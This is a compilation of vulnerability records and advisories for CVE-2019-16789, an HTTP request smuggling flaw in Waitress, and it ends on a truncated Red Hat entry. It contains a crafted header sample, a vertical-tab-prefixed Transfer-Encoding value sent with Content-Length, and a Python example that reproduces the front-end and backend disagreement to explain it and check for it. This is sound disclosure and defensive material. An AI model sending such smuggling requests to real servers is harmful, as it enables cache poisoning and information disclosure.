CVE-2019-16789
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T01:24:48.331Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "FEDORA-2020-bdcc8ffc24", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/" }, { "name": "FEDORA-2020-65a7744e38", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/" }, { "name": "RHSA-2020:0720", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/github/advisory-review/pull/14604" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Waitress", "vendor": "Pylons", "versions": [ { "lessThan": "1.4.1", "status": "affected", "version": "\u003c 1.4.1", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker 
that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-444", "description": "CWE-444 Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request Smuggling\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-05-12T23:06:09", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "FEDORA-2020-bdcc8ffc24", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/" }, { "name": "FEDORA-2020-65a7744e38", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/" }, { "name": "RHSA-2020:0720", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": 
"https://access.redhat.com/errata/RHSA-2020:0720" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/github/advisory-review/pull/14604" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html" } ], "source": { "advisory": "GHSA-m5ff-3wj3-8ph4", "discovery": "UNKNOWN" }, "title": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers", "workarounds": [ { "lang": "en", "value": "You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues." 
} ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", "ID": "CVE-2019-16789", "STATE": "PUBLIC", "TITLE": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Waitress", "version": { "version_data": [ { "version_affected": "\u003c", "version_name": "\u003c 1.4.1", "version_value": "1.4.1" } ] } } ] }, "vendor_name": "Pylons" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation." 
} ] }, "impact": { "cvss": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-444 Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request Smuggling\u0027)" } ] } ] }, "references": { "reference_data": [ { "name": "FEDORA-2020-bdcc8ffc24", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/" }, { "name": "FEDORA-2020-65a7744e38", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/" }, { "name": "RHSA-2020:0720", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes", "refsource": "MISC", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "name": "https://github.com/github/advisory-review/pull/14604", "refsource": "CONFIRM", "url": "https://github.com/github/advisory-review/pull/14604" }, { "name": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017", "refsource": "MISC", "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update", "refsource": "MLIST", "url": 
"https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html" } ] }, "source": { "advisory": "GHSA-m5ff-3wj3-8ph4", "discovery": "UNKNOWN" }, "work_around": [ { "lang": "en", "value": "You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues." } ] } } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2019-16789", "datePublished": "2019-12-26T16:40:12", "dateReserved": "2019-09-24T00:00:00", "dateUpdated": "2024-08-05T01:24:48.331Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2019-16789\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2019-12-26T17:15:13.707\",\"lastModified\":\"2024-11-21T04:31:11.543\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. 
This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.\"},{\"lang\":\"es\",\"value\":\"En Waitress versiones hasta 1.4.0, si un servidor proxy es usado frente a waitress, un atacante puede enviar una petici\u00f3n no comprobada que omita el front-end y que waitress analiza de manera diferente conllevando a un posible trafico no autorizado de peticiones HTTP. Waitress analizar\u00eda las peticiones especialmente dise\u00f1adas que contienen caracteres de espacio en blanco especiales en el encabezado Transfer-Encoding como si fuera una petici\u00f3n fragmentada, pero un servidor front-end usar\u00eda Content-Length en su lugar ya que el encabezado Transfer-Encoding es considerado no v\u00e1lido debido a que contiene caracteres no v\u00e1lidos. Si un servidor de aplicaciones para usuario establece una canalizaci\u00f3n HTTP hacia un servidor backend de Waitress, esto podr\u00eda conllevar a una divisi\u00f3n de la petici\u00f3n HTTP, lo que podr\u00eda generar un posible envenenamiento de la cach\u00e9 o una divulgaci\u00f3n inesperada de informaci\u00f3n. 
Este problema se soluciona en Waitress versi\u00f3n 1.4.1 por medio de una comprobaci\u00f3n del campo HTTP m\u00e1s estricta.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.8,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:N\",\"baseScore\":6.4,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":4.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]}],\"configurations
\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:agendaless:waitress:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.4.0\",\"matchCriteriaId\":\"A774428E-3DBB-49C8-A1E9-BAD2704F98DF\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C2A5B24D-BDF2-423C-98EA-A40778C01A05\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DEECE5FC-CACF-4496-A3E7-164736409252\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"97A4B8DF-58DA-4AB6-A1F9-331B36409BA3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"80F0FA5D-8D3B-4C0E-81E2-87998286AF33\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:redhat:openstack:15:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"70108B60-8817-40B4-8412-796A592E4E5E\"}]}]}],\"references\":[{\"url\":\"https://access.redhat.com/errata/RHSA-2020:0720\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/github/advisory-review/pull/14604\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken 
Link\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://access.redhat.com/errata/RHSA-2020:0720\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/github/advisory-review/pull/14604\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party 
Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]}]}}" } }
ghsa-968f-66r5-5v74
Vulnerability from github
5.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N
Impact
The patches introduced to fix https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 were not complete and would still allow an attacker to smuggle requests or split an HTTP request using invalid data.
This updates the existing CVE with ID: CVE-2019-16789
Patches
Waitress version 1.4.2 validates HTTP headers more strictly to avoid the issue, completely fixing all known issues with whitespace.
Workarounds
There are no workarounds; upgrading to Waitress 1.4.2 is highly recommended.
References
See https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 for more information on the security issue.
For more information
If you have any questions or comments about this advisory:
- open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)
- email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)
{ "affected": [ { "package": { "ecosystem": "PyPI", "name": "waitress" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.4.2" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2019-16789" ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-01-06T18:43:11Z", "nvd_published_at": "2019-12-26T17:15:00Z", "severity": "MODERATE" }, "details": "### Impact\n\nThe patches introduced to fix https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 were not complete and still would allow an attacker to smuggle requests/split a HTTP request with invalid data.\n\nThis updates the existing CVE with ID: CVE-2019-16789\n\n### Patches\n\nWaitress version 1.4.2 has been updated to now validate HTTP headers better to avoid the issue, completely fixing all known issues with whitespace.\n\n### Workarounds\n\nThere are no work-arounds, upgrading to Waitress 1.4.2 is highly recommended.\n\n### References\n\nSee https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 for more information on the security issue.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)\n* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)", "id": "GHSA-968f-66r5-5v74", "modified": "2024-11-19T13:58:27Z", "published": "2020-01-06T18:44:21Z", "references": [ { "type": "WEB", "url": "https://github.com/Pylons/waitress/security/advisories/GHSA-968f-66r5-5v74" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789" }, { "type": "WEB", "url": "https://github.com/github/advisory-review/pull/14604" }, { "type": "WEB", "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "type": "WEB", "url": 
"https://github.com/Pylons/waitress/commit/ddb65b489d01d696afa1695b75fdd5df3e4ffdf8" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "type": "WEB", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "type": "PACKAGE", "url": "https://github.com/Pylons/waitress" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-968f-66r5-5v74" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/waitress/PYSEC-2019-138.yaml" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N", "type": "CVSS_V3" }, { "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N", "type": "CVSS_V4" } ], "summary": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers (Follow-up)" }
ghsa-m5ff-3wj3-8ph4
Vulnerability from github
Impact
If a proxy server is used in front of Waitress, an attacker may send an invalid request that bypasses the front-end and is parsed differently by Waitress, leading to a potential for HTTP request smuggling.
```
Content-Length: 10
Transfer-Encoding: [\x0b]chunked
```
For clarity:
```
0x0b == vertical tab
```
Such a request would get parsed by Waitress as a chunked request, but a front-end server would use the Content-Length instead, since the Transfer-Encoding header is considered invalid due to containing invalid characters.
If a front-end server does HTTP pipelining to a backend Waitress server, this could lead to HTTP request splitting, which may lead to potential cache poisoning or unexpected information disclosure.
Patches
Please upgrade to Waitress 1.4.1 which fixes this issue with stricter HTTP field validation.
Because of this change, Waitress 1.4.1 has become much stricter about what is allowed in header values. While the maintainers don't believe these changes will cause any issues, they may cause failures with non-conformant reverse proxies or clients, and it is highly recommended that users validate the changes in their environment and make sure they won't cause any unacceptable failures.
Workarounds
You may enable additional protections on front-end servers; those that follow RFC 7230 correctly will drop the request with a 400 Bad Request.
Waitress will now correctly respond to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues.
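The disagreement the advisory describes, as an added Python example that is not Waitress's own code: the vertical-tab header block from above is constructed inline and run through three framing policies, a front-end that ignores the invalid Transfer-Encoding and falls back to Content-Length, an illustrative lenient backend that trims with Python's bytes.strip() (which also removes 0x0b), and an RFC 7230 field-value check that answers 400 Bad Request as Waitress 1.4.1 does. The function names, the regular expression and the sample header blocks are assumptions made for this example.

```python
import re

# RFC 7230 section 3.2: a field-value may contain VCHAR (0x21-0x7E), obs-text
# (0x80-0xFF) and, as the only permitted whitespace, SP (0x20) and HTAB (0x09).
# Vertical tab (0x0B), form feed (0x0C) and other control bytes are not allowed.
_FIELD_VALUE_OK = re.compile(rb"\A[\x09\x20\x21-\x7e\x80-\xff]*\Z")
_OWS = b" \t"  # optional whitespace that may legitimately surround a value

# Constructed sample header blocks (not captured traffic). The first one is the
# advisory's example: a Transfer-Encoding value prefixed with 0x0B.
SAMPLE_HEAD = b"Content-Length: 10\r\nTransfer-Encoding: \x0bchunked\r\n"
CLEAN_HEAD = b"Transfer-Encoding: chunked\r\n"


class BadRequest(Exception):
    """Raised where a strict server answers 400 Bad Request and closes the connection."""


def parse_headers(head: bytes) -> list[tuple[bytes, bytes]]:
    """Split a CRLF-terminated header block into (lower-cased name, raw value) pairs.
    Values are left untouched so the framing policies below can be compared."""
    pairs = []
    for line in head.split(b"\r\n"):
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            raise BadRequest("header line without ':'")
        pairs.append((name.strip(_OWS).lower(), value))
    return pairs


def frontend_framing(pairs) -> str:
    """Front-end behaviour from the advisory: a Transfer-Encoding value containing
    invalid bytes is treated as if the header were absent, so Content-Length wins."""
    for name, value in pairs:
        if name == b"transfer-encoding" and _FIELD_VALUE_OK.match(value):
            if value.strip(_OWS).lower() == b"chunked":
                return "chunked"
    return "content-length"


def lenient_backend_framing(pairs) -> str:
    """Illustrative lenient backend (not Waitress's actual code): bytes.strip() with no
    argument removes 0x0B and 0x0C as well as SP/HTAB, so b' \\x0bchunked' becomes
    b'chunked' and the body is framed as chunked."""
    for name, value in pairs:
        if name == b"transfer-encoding" and value.strip().lower() == b"chunked":
            return "chunked"
    return "content-length"


def strict_framing(pairs) -> str:
    """RFC 7230-style policy, as Waitress 1.4.1 behaves: reject any field value with
    bytes outside the grammar, trim only SP/HTAB, and only then decide the framing."""
    transfer_encoding = None
    for name, value in pairs:
        if not _FIELD_VALUE_OK.match(value):
            raise BadRequest(f"invalid byte in {name.decode('latin-1')!r} field value")
        if name == b"transfer-encoding":
            transfer_encoding = value.strip(_OWS).lower()
    if transfer_encoding is not None:
        # RFC 7230 section 3.3.3: chunked must be the final coding, otherwise 400.
        if transfer_encoding.split(b",")[-1].strip(_OWS) != b"chunked":
            raise BadRequest("Transfer-Encoding without final chunked coding")
        return "chunked"
    return "content-length"


def classify(head: bytes) -> dict:
    """Run all three policies over one header block; 'desync' is True when the
    front-end and the lenient backend would frame the same bytes differently."""
    pairs = parse_headers(head)
    try:
        strict = strict_framing(pairs)
    except BadRequest:
        strict = "400 Bad Request"
    front, back = frontend_framing(pairs), lenient_backend_framing(pairs)
    return {"frontend": front, "lenient_backend": back, "strict": strict,
            "desync": front != back}


if __name__ == "__main__":
    print(classify(SAMPLE_HEAD))  # front-end: content-length, lenient backend: chunked
    print(classify(CLEAN_HEAD))   # all policies agree on chunked
```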
References
This was mentioned in https://portswigger.net/research/http-desync-attacks-what-happened-next, and was specifically identified as an issue in HAProxy, which did not properly filter it, in this article: https://nathandavison.com/blog/haproxy-http-request-smuggling
Thanks
The Pylons Project would like to thank ZeddYu Lu for doing extended testing against Waitress 1.4.0 and bringing this to our attention!
For more information
If you have any questions or comments about this advisory:
- open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)
- email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)
{ "affected": [ { "ecosystem_specific": { "affected_functions": [ "waitress.parser.HTTPRequestParser.parse_header" ] }, "package": { "ecosystem": "PyPI", "name": "waitress" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.4.1" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2019-12-26T16:34:06Z", "nvd_published_at": null, "severity": "HIGH" }, "details": "### Impact\n\nIf a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling.\n\n```\nContent-Length: 10\nTransfer-Encoding: [\\x0b]chunked\n```\n\nFor clarity:\n\n```\n0x0b == vertical tab\n```\n\nWould get parsed by Waitress as being a `chunked` request, but a front-end server would use the `Content-Length` instead as the `Transfer-Encoding` header is considered invalid due to containing invalid characters.\n\nIf a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure.\n\n### Patches\n\nPlease upgrade to Waitress 1.4.1 which fixes this issue with stricter HTTP field validation.\n\nWaitress 1.4.1 due to this change has become much more strict in what is allowed in header values, while the maintainers don\u0027t believe that these changes will cause any issues, it may cause failures with non-conformist reverse proxies or clients, and it is highly recommend that users validate the changes in their environment and make sure it won\u0027t cause any unacceptable failures.\n\n### Workarounds\n\nYou may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop 
the connection to avoid any potential HTTP pipelining issues.\n\n### References\n\nThis was mentioned in https://portswigger.net/research/http-desync-attacks-what-happened-next and was specifically mentioned as being an issue in HAProxy which did not properly filter it in this article: https://nathandavison.com/blog/haproxy-http-request-smuggling\n\n### Thanks\n\nThe Pylons Project would like to thank ZeddYu Lu for doing extended testing against Waitress 1.4.0 and bringing this to our attention!\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)\n* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)", "id": "GHSA-m5ff-3wj3-8ph4", "modified": "2019-12-26T16:34:06Z", "published": "2019-12-26T16:34:38Z", "references": [ { "type": "WEB", "url": "https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4" }, { "type": "WEB", "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" } ], "schema_version": "1.4.0", "severity": [], "summary": "HTTP Request Smuggling: Invalid whitespace characters in headers in Waitress" }
rhsa-2021_0420
Vulnerability from csaf_redhat
Notes
